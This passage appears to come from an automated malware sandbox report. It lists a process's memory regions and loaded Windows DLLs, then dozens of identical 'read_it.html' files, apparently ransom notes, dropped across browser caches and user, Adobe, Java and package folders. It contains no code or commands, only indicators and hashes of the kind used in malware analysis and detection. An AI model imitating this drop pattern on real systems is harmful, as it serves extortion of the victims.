private_0x0000000002160000	0x02160000	0x0216ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002170000	0x02170000	0x0316ffff	Private Memory	Readable, Writable	Region Actions
mprapi.dll	0x72cd0000	0x72cf8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x72d00000	0x72d13fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
certcli.dll	0x72d20000	0x72d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
regapi.dll	0x734c0000	0x734d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74bb0000	0x74beafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74bf0000	0x74c05fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x74d80000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x74de0000	0x74e6efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x755b0000	0x756ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x757e0000	0x757ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75950000	0x75aabfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x75fe0000	0x76024fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	Actions
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\indexeddb\moz-safe-about+home\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\uk\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\offlinecache\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\f\a2\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\f\94\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\f\23\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\e9\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\69\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\57\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\45\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\d\fe\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\d\08\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\d\07\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\c\7f\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\c\1f\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\b\e5\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\b\64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\a\ce\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\a\ae\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\fd\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\e0\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\c3\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\8d\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\49\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\2c\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\10\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\8\ae\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\8\67\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\7\26\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\5\f1\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\5\1b\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\4\ee\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\4\20\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\3\da\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\2\bc\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\2\59\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\f6\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\e4\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\14\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\0c\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\03\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\0\f4\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\0\e1\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\0\cb\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\0\a8\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\0\98\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\adobe\color\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\adobe\color\profiles\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\adobe\acrobat\10.0\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\adobe\acrobat\10.0\cache\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\videos\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\videos\sample videos\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\recorded tv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\recorded tv\sample media\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\pictures\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\pictures\sample pictures\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\music\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\music\sample music\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\libraries\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\downloads\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\public\documents\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\programdata\sun\java\java update\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\packages\vcruntimeadditional_x86\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\packages\vcruntimeadditional_amd64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\packages\vcruntimeminimum_amd64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
